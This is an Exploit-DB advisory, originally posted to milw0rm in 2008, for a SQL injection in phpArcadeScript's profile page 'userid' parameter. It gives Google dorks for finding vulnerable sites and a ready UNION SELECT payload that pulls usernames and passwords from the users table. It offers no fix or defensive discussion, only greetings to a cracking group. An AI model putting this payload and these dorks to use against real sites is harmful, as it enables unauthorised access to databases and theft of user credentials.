phpArcadeScript 3.0RC2 - 'userid' SQL Injection

EDB-ID:

5208


Author:

SoSo H H

Type:

webapps


Platform:

PHP

Date:

2008-03-01


############################################################################
# phpArcadeScript (all version) Remote Sql Injection Exploit               #
#                                                                          #
# AUTHOR:SoSo H H (Iraqi-Cracker)                                          #
#                                                                          #
# Script Site: http://www.phparcadescript.com/                             #
#                                                                          #
# Price:$30.00                                                             #
#                                                                          #
# Tested on: Versions:1.0,2.0,3.0 RC1 &RC2                                 #
#                                                                          #
# Dorks:"Powered by phpArcadeScript v1.0"                                  #
#       "Powered by phpArcadeScript v2.0"                                  #
#       "Powered by phpArcadeScript v3.0RC1"                               #
#       "Powered by phpArcadeScript v3.0RC2"                               #
############################################################################
# Exploit in:                                                              #
# index.php?action=profile&userid=(SQL)                                    #
#                                                                          #
# Example:                                                                 #
#                                                                          #
# (SQL)=1+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+users/*#
############################################################################
# Greetz:                                                                  #
# L!0N,El Mariachi,My Sweet,Shadow Administrator,-=Miz0=-,Iraqi-KoRn       #
# Mini.Spider,and All 7shasha Boards Members!                              #
############################################################################  

# milw0rm.com [2008-03-01]